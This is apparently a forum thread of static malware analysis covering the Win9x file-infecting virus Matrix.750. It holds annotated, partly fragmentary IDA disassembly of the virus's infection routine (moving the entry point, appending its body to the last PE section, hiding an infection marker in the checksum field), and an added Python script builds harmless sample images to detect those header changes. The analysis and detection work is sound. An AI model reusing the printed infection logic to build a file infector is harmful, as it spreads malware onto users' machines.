W95/Matrix.750 Analysis


Hi pals, I've analysed this virus I found somewhere in the wild. Here is the analysis from my IDA disassembly listing.



; The main infection analysis is from offset : DATA:00402196
; This is a full static Analysis of the virus Matrix.750.
; A Win9x file infector using encryption routines to make its analysis harder.
; Once again this is not an obstacle, and the wonderful IDA just did its job by disassembling
; easily this Virus. see (www.datarescue.com).
; There are some ambiguities as you will see, but as I don't have any Win9x at home,
; I could not do a runtime analysis with Ice or IDA. However this won't be an obstacle to our analysis.
;
; The Analysis is more focused on the infection method. So you can skip some parts and
; jump to this address DATA:00402196 and see the comments.
;
; Feel free to contact me for any question
; Critics are welcome too.
;
; Analysis by asmatiks
; asmatx[\_at_/]yahoo[D0T]fr / Antithese[\_at_/]hairdresser[D0T]net
;
; 29/03/2007
;
; Here we go
CODE:00401000 ;
CODE:00401000 ; File Name : X:\Virus_Analysis_bin\SAMPLES_2_ANALYSE\Virus.Win32.Matrix.750\Virus.Win32.Matrix.750
CODE:00401000 ; Format : Portable executable for 80386 (PE)
CODE:00401000 ; Imagebase : 400000
CODE:00401000 ; Section 1. (virtual address 00001000)
CODE:00401000 ; Virtual size : 00001000 ( 4096.)
CODE:00401000 ; Section size in file : 00000200 ( 512.)
CODE:00401000 ; Offset to raw data for section: 00000600
CODE:00401000 ; Flags 60000020: Text Executable Readable
CODE:00401000 ; Alignment : default
CODE:00401000
CODE:00401000 .686p
CODE:00401000 .mmx
CODE:00401000 .model flat
CODE:00401000 ;when disassembling with IDA, the following code
CODE:00401000 ;needs to be converted manually by pressing the 'C' key once.
CODE:00401000 ;I realized it after the analysis :)
CODE:00401000 ; ---------------------------------------------------------------------------
CODE:00401000
CODE:00401000 ; Segment type: Pure code
CODE:00401000 ; Segment permissions: Read/Execute
CODE:00401000 CODE segment para public 'CODE' use32
CODE:00401000 assume cs:CODE
CODE:00401000 ;org 401000h
CODE:00401000 assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
CODE:00401000 push 0
CODE:00401002 call near ptr loc_401011+6
CODE:00401007 push edi
CODE:00401008 imul ebp, [esi+33h], 614D2E32h
CODE:0040100F jz short near ptr dword_40101D+66h
CODE:00401011
CODE:00401011 loc_401011: ; CODE XREF: CODE:00401002p
CODE:00401011 imul edi, [eax+2Eh], 0FF303537h
CODE:00401018 and eax, offset ExitProcess
CODE:00401018 ; ---------------------------------------------------------------------------
CODE:0040101D dword_40101D dd 78h dup(0)
CODE:004011FD align 10h
CODE:00401200 dd 380h dup(?)
CODE:00401200 CODE ends
CODE:00401200
DATA:00402000 ; Section 2. (virtual address 00002000)
DATA:00402000 ; Virtual size : 00001000 ( 4096.)
DATA:00402000 ; Section size in file : 00000400 ( 1024.)
DATA:00402000 ; Offset to raw data for section: 00000800
DATA:00402000 ; Flags C0000040: Data Readable Writable
DATA:00402000 ; Alignment : default
DATA:00402000 ; ═══════════════════════════════════════════════════════════════════════════
DATA:00402000
DATA:00402000 ; Segment type: Pure data
DATA:00402000 ; Segment permissions: Read/Write
DATA:00402000 DATA segment para public 'DATA' use32
DATA:00402000 assume cs:DATA
DATA:00402000 ;org 402000h
DATA:00402000
DATA:00402000 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
DATA:00402000
DATA:00402000
DATA:00402000 public start
DATA:00402000 start proc near ; DATA XREF: DATA:00402294r
DATA:00402000 ; DATA:00402212w
DATA:00402000
DATA:00402000 var_20 = dword ptr -20h
DATA:00402000
DATA:00402000 push 1000h ; size
DATA:00402005
DATA:00402005 Virus_start: ; DATA XREF: DATA:0040221Bw
DATA:00402005 push 0
DATA:0040200A pusha ; save all regs before infection.useful for the return to HOST
DATA:0040200B call $+5 ; push the addr of the next instruction onto the stack
DATA:00402010
DATA:00402010 Delta: ; DATA XREF: start+11o
DATA:00402010 pop ebp ; pop the pushed addr. ebp Section_Header
DATA:004021FB movzx eax, word ptr [edx+6]
DATA:004021FF dec eax ; num of sections == num of section - 1
DATA:00402200 imul eax, 28h ; size of a section Header
DATA:00402203 add esi, eax ; esi -> Last Section !
DATA:00402205 mov eax, [esi+14h] ; eax

continuation ... can't paste the whole listing?




don't paste the whole IDA disassembly.

it would be better to paste the highlights and more important information such as:

does it connect to a url or ip
is there a bot control
are there any email addresses
any strings that stand out
registry modifications
filesystem modifications
rootkit behavior
encryption

etc.

we can generally do our own disassembly :)

V.

continuation :)

Right, it makes sense Valsmith, so here we go on the infection process:


loc_402196: ; CODE XREF: DATA:00402191
data:00402196 jnz short loc_4021BA
data:00402198 mov eax, [edx+3Ch] ; eax -> PE HEADER
data:0040219B mov ss:dword_4022A1[ebp], eax
data:004021A1 xchg eax, edx ; now EDX -> PE H
data:004021A2 call near ptr dword_4022BD
data:004021A7 mov cx, 238h ; for infection marker generation
data:004021AB lea edx, dword_40242C[ebp]
data:004021B1 mov ah, 3Fh
data:004021B3 call near ptr dword_4022BD
data:004021B8 xor ecx, eax ;ecx= infection marker
data:004021BA
data:004021BA loc_4021BA: ; CODE XREF: DATA:loc_402196j
data:004021BA jnz short loc_4021BF
data:004021BC cmp byte ptr [edx], 50h
data:004021BF
data:004021BF loc_4021BF: ; CODE XREF: DATA:loc_4021BAj
data:004021BF jnz short Check_EXE
data:004021C1 mov [edx+58h], ecx ; checksum field: "mark infected"
data:004021C4 test byte ptr [edx+17h], 20h
data:004021C8
data:004021C8 Check_EXE: ; CODE XREF: DATA:loc_4021BF
data:004021C8 jnz short Get_Last_Section
data:004021CA test byte ptr [edx+16h], 2 ; PE FLAG : 2 == EXE. checking type of PE module.
data:004021CE jz Virus_end
data:004021D4 cmp word ptr [edx+4], 14Eh ; check platform:intel x86
data:004021DA ja short loc_4021E1
data:004021DC mov al, [edx+6] ; AL
              cmp al, 8 ; is num of sections > 8 ?
data:004021E1
data:004021E1 Check_SectionNum: ;loc_4021E1:
data:004021E1 ja Virus_end
;if so abort
data:004021E7 cmp al, 2 ; is num of sections
              lea esi, [eax+edx+18h] ; esi -> Section_Header
data:004021FB movzx eax, word ptr [edx+6]
data:004021FF dec eax ; num of sections == num of section - 1
data:00402200 imul eax, 28h ; size of a section Header
data:00402203 add esi, eax ; esi -> Last Section !
data:00402205 mov eax, [esi+14h] ; eax
              add eax, [esi+10h] ; point to size of Section Raw Data
data:0040220B cmp eax, edi ; ? == size of file alignment?
data:0040220D
data:0040220D Patch_Section_H: ; CODE XREF: DATA:Get_Last_Section
data:0040220D jnz short Exec_Vir
data:0040220F mov eax, [edx+28h] ; eax
              mov eax, [edx+34h] ; Image Base
data:0040221B mov dword ptr ss:(Virus_start+1)[ebp], eax ; store IB here
data:00402221 lea eax, [edi-2EEh]; 2EEh = size of virus
data:00402227 mov edi, eax
data:00402229 sub eax, [esi+14h]; Calc EP
data:0040222C add eax, [esi+0Ch]; Section RVA
data:0040222F mov [edx+28h], eax; NEW EP points to virus code in the Section
data:00402232 or byte ptr [esi+27h], 0C0h
data:00402236 mov eax, [esi+10h] ; eax
              add eax, 526h ; new size of raw data : size of raw data + 526h
data:0040223E push eax
data:0040223F mov ecx, [edx+3Ch]
data:00402242 dec ecx ; ecx
              and eax, ecx ; calc virtual size of section
data:00402249 cmp eax, [esi+8] ;
data:0040224C jb short Calc_MemSizeOfImage
data:0040224E mov [esi+8], eax ; virtual size of section
data:00402251
data:00402251 Calc_MemSizeOfImage: ; CODE XREF: DATA:0040224C
data:00402251 pop eax
data:00402252 add eax, [esi+0Ch] ; eax
              mov ecx, [edx+38h] ; section Mem alignment
data:00402258 dec ecx
data:00402259 add eax, ecx
data:0040225B not ecx
data:0040225D and eax, ecx
data:0040225F cmp eax, [edx+50h]
data:00402262 jb short Infect_Host
data:00402264 mov [edx+50h], eax ;
              lea esi, dword_4022BD[ebp] ; ??? k32 function
data:0040226F mov edx, edi
data:00402271 call esi
data:00402273 mov ah, 3Fh
data:00402275 mov ecx, 2EEh ; size Of Virus Code : 2EE Hex = 750 Decimal,hence the name Matrix.750
data:0040227A lea edx, dword_402664[ebp]
data:00402280 call esi
data:00402282 push edi
data:00402283 mov edi, edx ; inject virus code here
data:00402285 sub al, al ;edi -> destination
data:00402287 repe scasb ; infect now! copy virus body to host
data:00402289 pop edx ;
data:0040228A ;finished

That's all the main infection process.
I point this out for the simple reason that nowadays most malware are Trojans and worms,
without heavily infecting PE modules. After a while it's almost the same, whereas
analysing file infectors needs much more effort, and it can be fun.
This virus has some more features such as decryption routines... available in the full
disassembly. I'll try to post a link for those who might be interested.
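As an added example (not part of the original posts, and not the author's code), the script below walks the same PE fields the listing reads, using the same header offsets ([pe+28h] entry point, [pe+38h]/[pe+3Ch] alignments, [pe+50h] SizeOfImage, [pe+58h] CheckSum, 28h-byte section headers), and turns the infector's changes into a triage check: does the entry point fall in the last section, is that section writable (the `or byte ptr [esi+27h], 0C0h` sets MEM_READ|MEM_WRITE), does the last section end exactly at EOF, and does SizeOfImage agree with the section-alignment rounding the listing performs in `Calc_MemSizeOfImage`. The two PE images it analyses are constructed in-line with zero-filled section bodies; `build_sample_pe(infected=True)` only rewrites headers the way the listing does (EP moved to the old end of the last section, SizeOfRawData grown by 526h and aligned, flags ORed, a constructed marker in CheckSum) and appends no code. Sample names, the marker value and the `suspicious` rule are assumptions of this example.

```python
import struct

# IMAGE_SECTION_HEADER.Characteristics bit; the listing ORs 0xC0 into the top byte
IMAGE_SCN_MEM_WRITE = 0x80000000

def align_up(value, alignment):
    """Round up to a power-of-two alignment, exactly what the listing does with
    'dec ecx / add eax, ecx / not ecx / and eax, ecx'."""
    mask = alignment - 1
    return (value + mask) & ~mask

def parse_pe(data):
    """Read the PE32 fields the infector touches, at the offsets used in the listing."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]            # [mz+3Ch] -> PE header
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 0x18                                         # optional header
    pe = {
        "machine": machine, "characteristics": chars,            # [pe+4], [pe+16h]
        "entry": struct.unpack_from("<I", data, opt + 0x10)[0],   # [pe+28h] AddressOfEntryPoint
        "section_align": struct.unpack_from("<I", data, opt + 0x20)[0],  # [pe+38h]
        "file_align": struct.unpack_from("<I", data, opt + 0x24)[0],     # [pe+3Ch]
        "size_of_image": struct.unpack_from("<I", data, opt + 0x38)[0],  # [pe+50h]
        "checksum": struct.unpack_from("<I", data, opt + 0x40)[0],       # [pe+58h], marker slot
        "sections": [],
    }
    table = opt + opt_size                                        # [pe+18h] + SizeOfOptionalHeader
    for i in range(nsect):
        off = table + i * 0x28                                    # 28h bytes per section header
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        pe["sections"].append({
            "name": data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
            "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr,
            "flags": struct.unpack_from("<I", data, off + 0x24)[0],
        })
    return pe

def analyze(data):
    """Triage heuristics for an appending infector of the shape shown in the listing."""
    pe = parse_pe(data)
    last = pe["sections"][-1]
    ep = pe["entry"]
    entry_section = None
    for s in pe["sections"]:
        if s["va"] <= ep < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_section = s["name"]
    findings = []
    if entry_section == last["name"]:
        findings.append("entry point lies in the last section")
    if last["flags"] & IMAGE_SCN_MEM_WRITE:
        findings.append("last section is writable")
    if last["rawptr"] + last["rawsize"] == len(data):
        findings.append("last section ends exactly at end of file")
    if pe["checksum"] != 0:
        findings.append("CheckSum field is non-zero (the infector keeps its marker there)")
    # Calc_MemSizeOfImage: VA of last section + its size, rounded to SectionAlignment
    expected = align_up(last["va"] + max(last["vsize"], last["rawsize"]), pe["section_align"])
    return {
        "entry_section": entry_section,
        "findings": findings,
        "expected_size_of_image": expected,
        "size_of_image_consistent": expected == pe["size_of_image"],
        # assumed rule: EP inside a writable last section is the classic appended-body shape
        "suspicious": entry_section == last["name"] and bool(last["flags"] & IMAGE_SCN_MEM_WRITE),
    }

def build_sample_pe(infected=False):
    """Construct a minimal, non-runnable PE32 image (constructed sample, zero-filled bodies)."""
    file_align, sect_align = 0x200, 0x1000
    sections = [
        {"name": b".text", "vsize": 0x1000, "va": 0x1000, "rawsize": 0x200, "rawptr": 0x200, "flags": 0x60000020},
        {"name": b".data", "vsize": 0x1000, "va": 0x2000, "rawsize": 0x400, "rawptr": 0x400, "flags": 0x40000040},
    ]
    entry, checksum = 0x1000, 0
    if infected:                                   # mirror the header edits from the listing
        last = sections[-1]
        entry = last["va"] + last["rawsize"]       # NEW EP = old end of last section
        last["rawsize"] = align_up(last["rawsize"] + 0x526, file_align)  # +526h, file-aligned
        last["flags"] |= 0xC0000000                # or byte ptr [esi+27h], 0C0h
        checksum = 0x1234ABCD                      # constructed marker value
    last = sections[-1]
    size_of_image = align_up(last["va"] + max(last["vsize"], last["rawsize"]), sect_align)
    e_lfanew, buf = 0x40, bytearray(0x200)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    # Machine i386, 2 sections, SizeOfOptionalHeader 0xE0, EXECUTABLE_IMAGE | 32BIT_MACHINE
    struct.pack_into("<HHIIIHH", buf, e_lfanew + 4, 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = e_lfanew + 0x18
    struct.pack_into("<H", buf, opt, 0x10B)                       # PE32 magic
    struct.pack_into("<I", buf, opt + 0x10, entry)
    struct.pack_into("<I", buf, opt + 0x1C, 0x400000)             # ImageBase
    struct.pack_into("<II", buf, opt + 0x20, sect_align, file_align)
    struct.pack_into("<II", buf, opt + 0x38, size_of_image, 0x200)  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", buf, opt + 0x40, checksum)
    for i, s in enumerate(sections):
        off = opt + 0xE0 + i * 0x28
        buf[off:off + 8] = s["name"].ljust(8, b"\0")
        struct.pack_into("<IIII", buf, off + 8, s["vsize"], s["va"], s["rawsize"], s["rawptr"])
        struct.pack_into("<I", buf, off + 0x24, s["flags"])
    for s in sections:
        buf += bytes(s["rawsize"])                 # zero-filled section body, no real code
    return bytes(buf)

if __name__ == "__main__":
    for label in (False, True):
        print("infected sample" if label else "clean sample", analyze(build_sample_pe(label)))
```

To run this on a real file, pass its bytes to `analyze()`; the `suspicious` flag is a coarse triage signal (packers and some linkers also place the entry point in a late, writable section), so treat hits as candidates for the kind of manual listing review done in this thread rather than as a verdict.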